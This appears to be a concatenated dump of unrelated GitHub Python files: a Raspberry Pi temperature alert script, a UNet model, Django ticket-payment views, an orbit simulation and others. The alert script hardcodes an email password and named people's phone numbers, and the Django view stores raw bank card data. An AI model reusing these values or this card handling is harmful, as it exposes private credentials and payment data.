:meth:`mad_gui.MainWindow._export` or saved using :meth:`mad_gui.MainWindow._save_data_gui_format`.\n\n \"\"\"\n\n announce_data_types = Signal(dict) # MainWindow / DataSelector\n executed_algorithms = []\n\n save_sync = Signal()\n\n data_position_changed = Signal(float)\n video_window_closed = Signal()\n video_duration_available = Signal(float, float)\n gui_has_unsaved_changes = False\n plugins = []\n\n @Slot(int)\n def frame_changed(self, frame: int):\n self.signal_sample_changed.emit(self.synchronizer.frame_to_sample(frame))\n self.signal_frame_changed.emit(frame)\n\n @Slot(bool)\n def set_has_unsaved_changes(self, flag: bool):\n self.gui_has_unsaved_changes = flag\n\n\nStateKeeper = _StateKeeper()\n","repo_name":"mad-lab-fau/mad-gui","sub_path":"mad_gui/state_keeper.py","file_name":"state_keeper.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"95"} +{"seq_id":"25488616114","text":"#!/usr/bin/python\n#--------------------------------------\n# ___ ___ _ ____\n# / _ \\/ _ \\(_) __/__ __ __\n# / , _/ ___/ /\\ \\/ _ \\/ // /\n# /_/|_/_/ /_/___/ .__/\\_, /\n# /_/ /___/\n#\n# dht11.py\n# Basic example script to read DHT11 sensor using \n# Adafruit DHT library:\n# https://github.com/adafruit/Adafruit_Python_DHT\n#\n# Based on examples by Tony DiCola\n#\n# Author : Matt Hawkins\n# Date : 04/09/2017\n#\n# http://www.raspberrypi-spy.co.uk/tag/dht11/\n#\n#--------------------------------------\n\n#Didn't want to remove credit from the guy above who created the base of the code that I expanded on incase you guys want to check out the original\n\n#Created this code to check the temperature and send out emails/text alerts when over a certain amount of degrees\n#There is a cronjob that runs this script everyday at 5:01pm after everyone leaves for the day\n#The script is designed to run for 23 hours and 58 minutes\n#To view the cronjob type crontab -l\n#To change the cronjob settings type crontab -e and change the one corresponding to this file\n#Use the website: https://crontab.guru/ to help when changing the time for the cron schedule\n#For anything else cronjob related resort to this article: https://www.ostechnix.com/a-beginners-guide-to-cron-jobs/\n\nimport os\nimport re\nimport Adafruit_DHT\nimport time\nimport threading\nfrom datetime import datetime\nimport smtplib, ssl\n\n# Set sensor type : Options are DHT11,DHT22 or AM2302\nsensor = Adafruit_DHT.DHT22\n\n# Set GPIO sensor is connected to.\ngpio = 17\n\n#Set date and time\n\nnow = datetime.now()\ndt_string = now.strftime(\"%m/%d/%Y %H:%M\")\n\n#method for opening and writing to a file\ndef tempfile():\n f = open(\"temperature.txt\",'a+')\n for i in range (2):\n f.write(str)\n\nSMTP_PORT = 587 # For SSL\nSMTP_SERVER = \"smtp.gmail.com\" # Enter type of email server run\nGMAIL_USERNAME = \"noreply@easternia.com\" # Enter your address\nGMAIL_PASSWORD = \"newaccount12\" # Enter your password\nclass Emailer:\n def sendmail(self, recipient, subject, content):\n \n #Create Headers\n headers = [\"From: \" + GMAIL_USERNAME, \"Subject: \" + subject, \"To: \" + recipient,\n \"MIME-Version: 1.0\", \"Content-Type: text/html\"]\n headers = \"\\r\\n\".join(headers)\n \n #Connect to Gmail Server\n session = smtplib.SMTP(SMTP_SERVER, SMTP_PORT)\n session.ehlo()\n session.starttls()\n session.ehlo()\n \n #Login to Gmail\n session.login(GMAIL_USERNAME, GMAIL_PASSWORD)\n \n #Send Email & Exit\n session.sendmail(GMAIL_USERNAME, recipient, headers + \"\\r\\n\\r\\n\" + content)\n session.quit\n\n# Sets up where to send Emails\nsender = Emailer()\nsendTo = 'it@easternia.com' #It email chain\nsendTo2 = '3392292459@vtext.com' #Oliver\nsendTo3 = '3392224287@vtext.com' #Steve\nsendTo4 = '6175195579@vtext.com' #Chris\nsendTo5 = '7814241042@vtext.com' #Bob\n\n# Sets up the email subject and contents\nemailSubject = \"Waltham Server Rooms Hot\" \nemailContent = \"This is a test of my Email of temperature alerts\" \nemailSubject2 = \"Temperature Gauge Offline!!\" \nemailContent2 = \"Temperature gauge has been knocked offline. Failed to get reading.\"\n\n# Sets the maximum temperature for room before Alerts are sent out \ntempmax = (75.9) #Change value to set temperature\n\n\n# Creates a function called run_check to be called upon and executed to send the emails/texts out \ndef run_check():\n humidity, temperature = Adafruit_DHT.read_retry(sensor, gpio) #Assigns humidty and temperature output to respective variables\n temperature = float(temperature * 1.8 + 32) #Changes the temperature value from celsius to farenheit\n now = datetime.now() #Assigns the date and time to variable now\n dt_string = now.strftime(\"%m/%d/%Y %H:%M\") #Formats the now variable and assigns to a new variable dt_string\n if humidity is not None and temperature is not None: #if statement to make sure sensor is working\n print('Temp={0:0.1f} Humidity={1:0.1f}% '.format(temperature, humidity),dt_string) #Placed this here for testing purposes prints out if works\n if temperature > float(tempmax): #If the temperature is over the amount set in tempmax it will send emails/texts\n \n # Sends an email to the \"sendTo\" address with the specified \"emailSubject\" as the subject and \"emailContent\" as the email content.\n sender.sendmail(sendTo, emailSubject, emailContent)\n sender.sendmail(sendTo2, emailSubject, emailContent)\n sender.sendmail(sendTo3, emailSubject, emailContent)\n sender.sendmail(sendTo4, emailSubject, emailContent)\n sender.sendmail(sendTo5, emailSubject, emailContent)\n print ('fire sent')\n else:\n print ('ok')\n else:\n sender.sendmail(sendTo, emailSubject2, emailContent2) #Sends out the notice that the reader is down to IT email\n print('Failed to get reading. Try again!')\n \n\n#Sets the counter values for the loops\ncounter2 = (5) #This counter is set to 29 because the counter2 if statement is triggered once it hits 30. it then takes an hour with this setup to trigger again\ncounter = (0) #For the while loop so our main loop keeps going for 23 hrs and 58min because the sleep time is set to 2 minutes and runs 719 times\n\nwhile counter < 143:\n #runs the runcheck command and sends out emails and texts alerts\n\n #Needed to run temperature check seperate to save it to temp1 variable\n humidity, temperature = Adafruit_DHT.read_retry(sensor, gpio)\n temperature = float(temperature * 1.8 + 32)\n now = datetime.now()\n dt_string = now.strftime(\"%m/%d/%Y %H:%M\")\n #Saves Temperature to a variable\n temp1 = ('Temp={0:0.1f} Humidity={1:0.1f}% '.format(temperature, humidity),dt_string)\n #Turns temperature output into a string\n temp2 = (str(temp1))\n #expression to remove weird characters from string\n temp3 = re.sub(\"'|\\(|\\)|,\", '', temp2)\n print(temp3)\n f = open(\"temperature.txt\",'a+')\n f.write(temp3)\n f.write(\"\\r\\n\")\n f.close()\n if temperature > float(tempmax):\n print('fire')\n counter2 = counter2 + 1\n counter = counter + 1 \n else:\n counter = counter + 1\n if counter2 >= (6):\n emailContent = \"Waltham server room temperature is high, the current temp is: \" + str(int(temperature)) + \" degrees\"\n run_check()\n counter2 = (0)\n else:\n print ('ok') \n time.sleep(599) #Amount of seconds before the code runs again\nprint ('finished')\n\n#humidity, temperature = Adafruit_DHT.read_retry(sensor, gpio)\n \n# Reading the DHT11 is very sensitive to timings and occasionally\n# the Pi might fail to get a valid reading. So check if readings are valid.\n#if humidity is not None and temperature is not None:\n #print('Temp={0:0.1f}*C Humidity={1:0.1f}%'.format(temperature, humidity))\n#else:\n #print('Failed to get reading. Try again!')\n","repo_name":"osantana19/Temperature_Monitor","sub_path":"dht11.py","file_name":"dht11.py","file_ext":"py","file_size_in_byte":7042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"11802996272","text":"name = input(\"Enter Your Name=\")\r\nd = {}\r\nfor i in name:\r\n d[i] = d.get(i,0)+1\r\nfor x,y in d.items():\r\n print(x,\"occur\",y,\"times\")\r\ngreater = dict((x, y) for x, y in d.items() if y >1)\r\nprint (\"The value greater than 1 is printed here=\",greater)\r\nequal = dict((x, y) for x, y in d.items() if y ==1)\r\nprint (\"The value equal to 1 is printed here=\",equal)\r\nprint(sorted([x,\"is the highest occur in\",y,\"times\"]for x,y in d.items())[0])\r\n","repo_name":"THULASIPRABHA/Task","sub_path":"task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"5115653579","text":"\"\"\" UNet \"\"\"\nfrom typing import Literal\n\nimport tensorflow as tf\nfrom pydantic import BaseModel, Field\n\nfrom .blocks import batch_norm, layer_norm, relu6\n\n\nclass UNetBlockParams(BaseModel):\n \"\"\"UNet block parameters\"\"\"\n\n filters: int = Field(..., description=\"# filters\")\n depth: int = Field(default=1, description=\"Layer depth\")\n kernel: int | tuple[int, int] = Field(default=3, description=\"Kernel size\")\n pool: int | tuple[int, int] = Field(default=3, description=\"Pool size\")\n strides: int | tuple[int, int] = Field(default=1, description=\"Stride size\")\n skip: bool = Field(default=True, description=\"Add skip connection\")\n seperable: bool = Field(default=False, description=\"Use seperable convs\")\n dropout: float | None = Field(default=None, description=\"Dropout rate\")\n norm: Literal[\"batch\", \"layer\"] | None = Field(default=\"batch\", description=\"Normalization type\")\n dilation: int | tuple[int, int] | None = Field(default=None, description=\"Dilation factor\")\n\n\nclass UNetParams(BaseModel):\n \"\"\"UNet parameters\"\"\"\n\n blocks: list[UNetBlockParams] = Field(default_factory=list, description=\"UNet blocks\")\n include_top: bool = Field(default=True, description=\"Include top\")\n use_logits: bool = Field(default=True, description=\"Use logits\")\n model_name: str = Field(default=\"UNet\", description=\"Model name\")\n output_kernel_size: int | tuple[int, int] = Field(default=3, description=\"Output kernel size\")\n output_kernel_stride: int | tuple[int, int] = Field(default=1, description=\"Output kernel stride\")\n include_rnn: bool = Field(default=False, description=\"Include RNN\")\n\n\ndef UNet(\n x: tf.Tensor,\n params: UNetParams,\n num_classes: int,\n) -> tf.keras.Model:\n \"\"\"Create UNet TF functional model\n\n Args:\n x (tf.Tensor): Input tensor\n params (ResNetParams): Model parameters.\n num_classes (int, optional): # classes.\n\n Returns:\n tf.keras.Model: Model\n \"\"\"\n requires_reshape = len(x.shape) == 3\n if requires_reshape:\n y = tf.keras.layers.Reshape((1,) + x.shape[1:])(x)\n else:\n y = x\n\n #### ENCODER ####\n skip_layers: list[tf.keras.layers.Layer | None] = []\n for i, block in enumerate(params.blocks):\n name = f\"ENC{i+1}\"\n ym = y\n for d in range(block.depth):\n dname = f\"{name}.D{d+1}\"\n if block.dilation is None:\n dilation_rate = (1, 1)\n elif isinstance(block.dilation, int):\n dilation_rate = (block.dilation**d, block.dilation**d)\n else:\n dilation_rate = (block.dilation[0] ** d, block.dilation[1] ** d)\n if block.seperable:\n ym = tf.keras.layers.SeparableConv2D(\n block.filters,\n kernel_size=block.kernel,\n strides=(1, 1),\n padding=\"same\",\n dilation_rate=dilation_rate,\n depthwise_initializer=\"he_normal\",\n pointwise_initializer=\"he_normal\",\n depthwise_regularizer=tf.keras.regularizers.L2(1e-3),\n pointwise_regularizer=tf.keras.regularizers.L2(1e-3),\n use_bias=block.norm is None,\n name=f\"{dname}.conv\",\n )(ym)\n else:\n ym = tf.keras.layers.Conv2D(\n block.filters,\n kernel_size=block.kernel,\n strides=(1, 1),\n padding=\"same\",\n dilation_rate=dilation_rate,\n kernel_initializer=\"he_normal\",\n kernel_regularizer=tf.keras.regularizers.L2(1e-3),\n use_bias=block.norm is None,\n name=f\"{dname}.conv\",\n )(ym)\n if block.norm == \"layer\":\n ym = layer_norm(name=dname, axis=[1, 2])(ym)\n elif block.norm == \"batch\":\n ym = batch_norm(name=dname, momentum=0.99)(ym)\n ym = relu6(name=dname)(ym)\n # END FOR\n\n # Project residual\n yr = tf.keras.layers.Conv2D(\n block.filters,\n kernel_size=(1, 1),\n strides=(1, 1),\n padding=\"same\",\n kernel_initializer=\"he_normal\",\n kernel_regularizer=tf.keras.regularizers.L2(1e-3),\n name=f\"{name}.skip\",\n )(y)\n\n if block.dropout is not None:\n ym = tf.keras.layers.Dropout(block.dropout, noise_shape=ym.shape)(ym)\n y = tf.keras.layers.add([ym, yr], name=f\"{name}.add\")\n\n skip_layers.append(y if block.skip else None)\n\n y = tf.keras.layers.MaxPooling2D(block.pool, strides=block.strides, padding=\"same\", name=f\"{name}.pool\")(y)\n # END FOR\n\n if params.include_rnn:\n if requires_reshape:\n y = tf.keras.layers.Reshape(y.shape[2:])(y)\n y = tf.keras.layers.LSTM(units=params.blocks[-1].filters, return_sequences=True)(y)\n y = tf.keras.layers.Reshape((1,) + y.shape[1:])(y)\n else:\n y = tf.keras.layers.ConvLSTM1D(params.blocks[-1].filters, padding=\"same\", return_sequences=True)(y)\n\n #### DECODER ####\n for i, block in enumerate(reversed(params.blocks)):\n name = f\"DEC{i+1}\"\n for d in range(block.depth):\n dname = f\"{name}.D{d+1}\"\n if block.seperable:\n y = tf.keras.layers.SeparableConv2D(\n block.filters,\n kernel_size=block.kernel,\n strides=(1, 1),\n padding=\"same\",\n dilation_rate=dilation_rate,\n depthwise_initializer=\"he_normal\",\n pointwise_initializer=\"he_normal\",\n depthwise_regularizer=tf.keras.regularizers.L2(1e-3),\n pointwise_regularizer=tf.keras.regularizers.L2(1e-3),\n use_bias=block.norm is None,\n name=f\"{dname}.conv\",\n )(y)\n else:\n y = tf.keras.layers.Conv2D(\n block.filters,\n kernel_size=block.kernel,\n strides=(1, 1),\n padding=\"same\",\n dilation_rate=dilation_rate,\n kernel_initializer=\"he_normal\",\n kernel_regularizer=tf.keras.regularizers.L2(1e-3),\n use_bias=block.norm is None,\n name=f\"{dname}.conv\",\n )(y)\n if block.norm == \"layer\":\n y = layer_norm(name=dname, axis=[1, 2])(y)\n elif block.norm == \"batch\":\n y = batch_norm(name=dname, momentum=0.99)(y)\n y = relu6(name=dname)(y)\n # END FOR\n\n y = tf.keras.layers.UpSampling2D(size=block.strides, name=f\"{dname}.unpool\")(y)\n\n # Add skip connection\n dname = f\"{name}.D{block.depth+1}\"\n skip_layer = skip_layers.pop()\n if skip_layer is not None:\n y = tf.keras.layers.concatenate([y, skip_layer], name=f\"{dname}.cat\") # Can add or concatenate\n # Use 1x1 conv to reduce filters\n y = tf.keras.layers.Conv2D(\n block.filters,\n kernel_size=(1, 1),\n padding=\"same\",\n kernel_initializer=\"he_normal\",\n kernel_regularizer=tf.keras.regularizers.L2(1e-3),\n use_bias=block.norm is None,\n name=f\"{dname}.conv\",\n )(y)\n if block.norm == \"layer\":\n y = layer_norm(name=dname, axis=[1, 2])(y)\n elif block.norm == \"batch\":\n y = batch_norm(name=dname, momentum=0.99)(y)\n y = relu6(name=dname)(y)\n # END IF\n\n dname = f\"{name}.D{block.depth+2}\"\n if block.seperable:\n ym = tf.keras.layers.SeparableConv2D(\n block.filters,\n kernel_size=block.kernel,\n strides=(1, 1),\n padding=\"same\",\n depthwise_initializer=\"he_normal\",\n pointwise_initializer=\"he_normal\",\n depthwise_regularizer=tf.keras.regularizers.L2(1e-3),\n pointwise_regularizer=tf.keras.regularizers.L2(1e-3),\n use_bias=block.norm is None,\n name=f\"{dname}.conv\",\n )(y)\n else:\n ym = tf.keras.layers.Conv2D(\n block.filters,\n kernel_size=block.kernel,\n strides=(1, 1),\n padding=\"same\",\n kernel_initializer=\"he_normal\",\n kernel_regularizer=tf.keras.regularizers.L2(1e-3),\n use_bias=block.norm is None,\n name=f\"{dname}.conv\",\n )(y)\n if block.norm == \"layer\":\n ym = layer_norm(name=dname, axis=[1, 2])(ym)\n elif block.norm == \"batch\":\n ym = batch_norm(name=dname, momentum=0.99)(ym)\n ym = relu6(name=dname)(ym)\n\n # Project residual\n yr = tf.keras.layers.Conv2D(\n block.filters,\n kernel_size=(1, 1),\n padding=\"same\",\n kernel_initializer=\"he_normal\",\n kernel_regularizer=tf.keras.regularizers.L2(1e-3),\n name=f\"{name}.skip\",\n )(y)\n y = tf.keras.layers.add([ym, yr], name=f\"{name}.add\") # Add back residual\n # END FOR\n\n if params.include_top:\n # Add a per-point classification layer\n y = tf.keras.layers.Conv2D(\n num_classes,\n kernel_size=params.output_kernel_size,\n padding=\"same\",\n kernel_initializer=\"he_normal\",\n kernel_regularizer=tf.keras.regularizers.L2(1e-3),\n name=\"NECK.conv\",\n use_bias=True,\n )(y)\n if not params.use_logits:\n y = tf.keras.layers.Softmax()(y)\n # END IF\n # END IF\n if requires_reshape:\n y = tf.keras.layers.Reshape(y.shape[2:])(y)\n # Define the model\n model = tf.keras.Model(x, y, name=params.model_name)\n return model\n","repo_name":"AmbiqAI/sleepkit","sub_path":"sleepkit/models/unet.py","file_name":"unet.py","file_ext":"py","file_size_in_byte":10064,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"25510727915","text":"import numpy as np\n\ndef power(sample1, sample2, reps, size, alpha):\n times_greater = 0\n mean_sample_1 = np.mean(sample1)\n mean_sample_2 = np.mean(sample2)\n obsv = mean_sample_2 - mean_sample_1\n\n new_samples_index1 = np.random.randint(0, size, (reps, size))\n new_samples_index2 = np.random.randint(0, size, (reps, size))\n new_samples1 = sample1[new_samples_index1]\n new_samples2 = sample2[new_samples_index2]\n\n for rep in range(reps):\n s1 = new_samples1[rep, :]\n s2 = new_samples2[rep, :]\n s1_mean = np.mean(s1)\n s2_mean = np.mean(s2)\n perm = s2_mean-s1_mean\n if perm > obsv:\n times_greater +=0.1\n\n\n p = times_greater/reps\n","repo_name":"nwisken/ce888labs","sub_path":"lab2/Power.py","file_name":"Power.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"74399056953","text":"from django.shortcuts import render\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\n\nfrom chetverka.models import Ticket, PricesAndProducts, Transaction, bankCard, logger\nfrom django.views.generic import DetailView\nfrom chetverka.forms import bankCardForm\nfrom teletroyka.models import TelegramUser\nimport re, random, json\n\nfrom rest_framework.parsers import JSONParser\n\n\ndef log(request):\n search_query = request.GET.get('search')\n data = Ticket.objects.all()\n if search_query == None:\n data = Ticket.objects.filter(id__in=data).order_by('id')\n elif re.match(r\"\\D{2,}\", search_query) != None:\n data = Ticket.objects.filter(id__in=data, ticket_type__contains=search_query).order_by('-id')\n elif re.match(r\"\\d{10}\", search_query) != None:\n data = Ticket.objects.filter(id__in=data, ticket_number__contains=search_query).order_by('-id')\n elif re.search(r\"\\d{1,}\", search_query) != None:\n data = Ticket.objects.filter(id__in=data, id__contains=search_query).order_by('-id')\n else :\n print('Not Found')\n return render(request, 'chetverka/log.html', {'Ticket': data})\n\n\nclass Detalization(DetailView):\n model = Ticket\n template_name = 'chetverka/detalization.html'\n context_object_name = 'record'\n\n\ndef base(request):\n data = PricesAndProducts.objects.all()\n return render(request, 'chetverka/base.html', {'price': data})\n\nclass PricesAndProductsController(DetailView):\n model = PricesAndProducts\n template_name = 'base/chetverka/payform.html'\n context_object_name = 'record'\n form = bankCardForm\n\n\n\n def get_context_data(self, **kwargs):\n\n context = super(PricesAndProductsController, self).get_context_data(**kwargs)\n context['form'] = bankCardForm()\n return context\n\n def post(self, request, *args, **kwargs):\n user = TelegramUser.objects.get(pk=1) #ID юзера изменить!!\n if request.method == 'POST':\n form = bankCardForm(request.POST)\n if form.is_valid():\n bank_card = form.save(commit=False)\n print(bank_card)\n bank_card.telegramuser = user\n print(bank_card)\n bank_card.save()\n transact = Transaction.objects.create(tr_status='Succeed', bankcard=bank_card)\n Ticket.objects.create(ticket_type='Тройка', ticket_number=random.randint(1000000000, 9999999999), transaction=transact)\n return render(request, 'chetverka/status.html')\n else:\n form = bankCardForm(initial=user)\n\n return render(request, 'chetverka/base.html', {'form': form})\n\ndef test(request):\n return render(request, 'chetverka/TestView.html')\n\n@api_view(['POST'])\ndef pay(request):\n\n print(request.data)\n data = dict(request.data)\n\n data1 = str(data.get('description[]'))\n user_id = re.search(r\"\\d{9,10}\", str(data.get('tg_user_data')))\n\n try:\n teleuser = TelegramUser.objects.get(telegram_user_id=user_id[0])\n bank_card = bankCard.objects.create(card_value=data.get('bank_card[]')[2], expired_month=data.get('bank_card[]')[3], expired_year=data.get('bank_card[]')[4], card_holder=data.get('bank_card[]')[0], telegramuser=teleuser)\n transact = Transaction.objects.create(tr_status='Succeed', tr_obj_description=data.get('description[]'), bankcard=bank_card)\n\n match = re.findall(r\"'\\d{1,2}\", data1)\n match1 = re.findall(r\"\\d{1,2}\", str(match))\n name = re.findall(r\"Билет \\w* \\\"\\D*\\\"\", data1)\n print(len(data['description[]']))\n\n for i in range(len(data['description[]'])):\n prod = PricesAndProducts.objects.get(product=name[i])\n for a in range(int(match1[i])):\n Ticket.objects.create(ticket_number=random.randint(1000000000, 9999999999), transaction=transact, tovar=prod)\n logger.objects.create(log=request.data, error=None)\n except Exception as e:\n logger.objects.create(log=user_id, error=e)\n\n\n return Response({'status': 1})","repo_name":"Xmel01/chetverka-main","sub_path":"chetverka/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4080,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"12880298153","text":"from numpy import sqrt\nimport time\nimport RungeKuttaFehlberg as RKF\nimport numpy as np\n# for Python2\n# from tkinter import * ## notice capitalized T in Tkinter\nimport scipy.integrate as integrate\n\nimport matplotlib.pyplot as plot\nimport matplotlib.animation as animation\n\n\nclass Orbit:\n GravConstant = 6.67408 * 10 ** (-11)\n M_e = 5.972 * 10 ** 24\n M_m = 7.34767309 * 10 ** 22\n h = 0.1\n tol = 05e-14\n prevPositions = [[0], [384400000]]\n\n \"\"\"\n\n Orbit Class\n\n init_state is [t0,x0,vx0,y0,vx0],\n where (x0,y0) is the initial position\n , (vx0,vy0) is the initial velocity\n and t0 is the initial time\n \"\"\"\n\n def __init__(self,\n init_state,\n G=GravConstant,\n m1=M_e,\n m2=M_m,\n ):\n self.GravConst = G\n self.mPlanet1 = m1\n self.mPlanet2 = m2\n self.state = np.asarray(init_state, dtype='float')\n self.rkf54 = RKF.RungeKuttaFehlberg54(self.ydot, len(self.state), self.h, self.tol)\n self.prevPositions = self.prevPositions\n\n def getPos(self):\n return self.prevPositions\n\n def addPos(self, x, y):\n self.prevPositions[0].append(x)\n self.prevPositions[1].append(y)\n\n def position(self):\n \"\"\"compute the current x,y positions of the pendulum arms\"\"\"\n x1 = self.state[1]\n y1 = self.state[3]\n x2 = self.state[5]\n y2 = self.state[7]\n return (x1, y1), (x2, y2)\n\n def energy(self):\n pxJ = self.state[1]\n vxJ = self.state[2]\n pyJ = self.state[3]\n vyJ = self.state[4]\n pxM = self.state[5]\n vxM = self.state[6]\n pyM = self.state[7]\n vyM = self.state[8]\n mJorda = self.mPlanet1\n mManen = self.mPlanet2\n G = self.GravConst\n dist = np.sqrt((pxM - pxJ) ** 2 + (pyM - pyJ) ** 2)\n uTot = -G * mJorda * mManen / dist\n kJorda = mJorda * (vxJ ** 2 + vyJ ** 2) / 2\n kManen = mManen * (vxM **2 + vyM**2)/2\n return (kJorda + uTot + kManen )/(10**24)\n\n def time_elapsed(self):\n return self.state[0]\n\n def step(self):\n w0 = self.state\n self.state, E = self.rkf54.safeStep(w0)\n\n def ydot(self, x):\n mJorda = self.mPlanet1\n mManen = self.mPlanet2\n pxJ = x[1]\n vxJ = x[2]\n pyJ = x[3]\n vyJ = x[4]\n pxM = x[5]\n vxM = x[6]\n pyM = x[7]\n vyM = x[8]\n\n z = np.zeros(9)\n dist = np.sqrt((pxM - pxJ) ** 2 + (pyM - pyJ) ** 2)\n z[0] = 1\n z[1] = vxJ\n z[2] = (self.GravConst * mManen * (pxM - pxJ)) / (dist ** 3)\n z[3] = vyJ\n z[4] = (self.GravConst * mManen * (pyM - pyJ)) / (dist ** 3)\n z[5] = vxM\n z[6] = (self.GravConst * mJorda * (pxJ - pxM)) / (dist ** 3)\n z[7] = vyM\n z[8] = (self.GravConst * mJorda * (pyJ - pyM)) / (dist ** 3)\n return z\n\n\n# make an Orbit instance\n# init_state: [t0, x0J, vx0J, y0MJ vy0J, x0M, vx0M, y0M, vy0M],\norbit = Orbit([0, 0, 0, 0, 0, 0, -1022, 384000000, 0])\ndt = 1. / 30 # 30 frames per second\n\n# The figure is set\nfig = plot.figure()\naxes = fig.add_subplot(111, aspect='equal', autoscale_on=False,\n xlim=(-0.5 * 10 ** 9, 0.5 * 10 ** 9), ylim=(-0.5 * 10 ** 9, 0.5 * 10 ** 9))\n\ntrail, = axes.plot([], [], 'r--', lw=0.5)\nlineA, = axes.plot([], [], 'o-b', lw=60, ms=12) # A blue planet 6*10**6\nlineB, = axes.plot([], [], 'o-r', lw=17, ms=3.4) # A white planet\n\n# line2, = axes.plot([], [], 'o-y', lw=2) # A yellow sun\ntime_text = axes.text(0.02, 0.95, '', transform=axes.transAxes)\nenergy_text = axes.text(0.02, 0.90, '', transform=axes.transAxes)\n\n\ndef init():\n \"\"\"initialize animation\"\"\"\n lineA.set_data([], [])\n trail.set_data([], [])\n lineB.set_data([], [])\n time_text.set_text('')\n energy_text.set_text('')\n return lineA, lineB, time_text, energy_text\n\n\ndef animate(i):\n \"\"\"perform animation step\"\"\"\n global orbit, dt\n secondsPerFrame = 3600 * 24 / 36\n t0 = orbit.state[0]\n while orbit.state[0] < t0 + secondsPerFrame:\n orbit.step()\n\n posJ, posM = orbit.position()\n x = posM[0]\n y = posM[1]\n orbit.addPos(x, y)\n trail.set_data(orbit.getPos())\n lineA.set_data(*posJ)\n lineB.set_data(*posM)\n t1 = orbit.time_elapsed()\n antallDager = t1 / (24 * 3600)\n\n time_text.set_text('time %.3f Days' % antallDager)\n energy_text.set_text('energy = %.5f YJ' % orbit.energy())\n return lineA, lineB, time_text, energy_text\n\n\n# choose the interval based on dt and the time to animate one step\n# Take the time for one call of the animate.\nt0 = time.time()\nanimate(0)\nt1 = time.time()\n\ndelay = 2000 * dt - (t1 - t0)\n\nanim = animation.FuncAnimation(fig, # figure to plot in\n animate, # function that is called on each frame\n frames=1200, # total number of frames\n interval=1.0/30, # time to wait between each frame.\n repeat=False,\n blit=True,\n init_func=init # initialization\n )\n\n# save the animation as an mp4. This requires ffmpeg or mencoder to be\n# installed. The extra_args ensure that the x264 codec is used, so that\n# the video can be embedded in html5. You may need to adjust this for\n# your system: for more information, see\n# http://matplotlib.sourceforge.net/api/animation_api.html\nanim.save('Oppg3.mp4', fps=30, extra_args=['-vcodec', 'libx264'])\n\n#\n#\n#plot.show()\n","repo_name":"HallvardSelthun/TDAT3024Prosjekt","sub_path":"Oppgave3.py","file_name":"Oppgave3.py","file_ext":"py","file_size_in_byte":5621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"15820885235","text":"__docformat__ = \"reStructuredText\"\n\nimport sys\nimport optparse\nimport time\n\n\nfrom pyang import plugin, error, xpath_lexer, util, statements, types\n\nfrom .schemanode import SchemaNode\n\ndef pyang_plugin_init():\n plugin.register_plugin(DSDLPlugin())\n\nclass DSDLPlugin(plugin.PyangPlugin):\n def add_output_format(self, fmts):\n self.multiple_modules = True\n fmts['dsdl'] = self\n def add_opts(self, optparser):\n optlist = [\n optparse.make_option(\"--dsdl-no-documentation\",\n dest=\"dsdl_no_documentation\",\n action=\"store_true\",\n default=False,\n help=\"No output of DTD compatibility\"\n \" documentation annotations\"),\n optparse.make_option(\"--dsdl-no-dublin-core\",\n dest=\"dsdl_no_dublin_core\",\n action=\"store_true\",\n default=False,\n help=\"No output of Dublin Core\"\n \" metadata annotations\"),\n optparse.make_option(\"--dsdl-record-defs\",\n dest=\"dsdl_record_defs\",\n action=\"store_true\",\n default=False,\n help=\"Record all top-level defs\"\n \" (even if not used)\"),\n optparse.make_option(\"--dsdl-lax-yang-version\",\n dest=\"dsdl_lax_yang_version\",\n action=\"store_true\",\n default=False,\n help=\"Try to translate modules with \"\n \"unsupported YANG versions (use at own risk)\"),\n ]\n g = optparser.add_option_group(\"Hybrid DSDL schema \"\n \"output specific options\")\n g.add_options(optlist)\n\n def emit(self, ctx, modules, fd):\n if 'submodule' in [ m.keyword for m in modules ]:\n raise error.EmitError(\"Cannot translate submodules\")\n emit_dsdl(ctx, modules, fd)\n\ndef emit_dsdl(ctx, modules, fd):\n for epos, etag, eargs in ctx.errors:\n if error.is_error(error.err_level(etag)):\n raise error.EmitError(\"DSDL translation needs a valid module\")\n schema = HybridDSDLSchema().from_modules(modules,\n ctx.opts.dsdl_no_dublin_core,\n ctx.opts.dsdl_no_documentation,\n ctx.opts.dsdl_record_defs,\n ctx.opts.dsdl_lax_yang_version,\n debug=0)\n fd.write(schema.serialize())\n\nclass Patch(object):\n\n \"\"\"Instances of this class represent a patch to the YANG tree.\n\n A Patch is filled with substatements of 'refine' and/or 'augment'\n that are to be applied to a single node.\n\n Instance variables:\n\n * `self.path`: list specifying the relative path to the node where\n the patch is to be applied\n\n * `self.plist`: list of statements to apply\n \"\"\"\n\n def __init__(self, path, refaug):\n \"\"\"Initialize the instance with `refaug` statement.\n\n `refaug` must be either 'refine' or 'augment'.\n \"\"\"\n self.path = path\n self.plist = [refaug]\n\n def pop(self):\n \"\"\"Pop and return the first element of `self.path`.\"\"\"\n return self.path.pop(0)\n\n def combine(self, patch):\n \"\"\"Add `patch.plist` to `self.plist`.\"\"\"\n exclusive = set([\"config\", \"default\", \"mandatory\", \"presence\",\n \"min-elements\", \"max-elements\"])\n kws = set([s.keyword for s in self.plist]) & exclusive\n add = [n for n in patch.plist if n.keyword not in kws]\n self.plist.extend(add)\n\nclass HybridDSDLSchema(object):\n\n \"\"\"Instance of this class maps YANG to the hybrid DSDL schema.\n\n Typically, only a single instance is created.\n\n Instance variables:\n\n * `self.all_defs`: dictionary of all named pattern\n definitions. The keys are mangled names of the definitions.\n\n * `self.data`: root of the data tree.\n\n * `self.debug`: debugging information level (0 = no debugging).\n\n * `self.gg_level`: level of immersion in global groupings.\n\n * `self.global_defs`: dictionary of global (aka chameleon) named\n pattern definitions. The keys are mangled names of the\n definitions.\n\n * `self.identities`: dictionary of identity names as keys and the\n corresponding 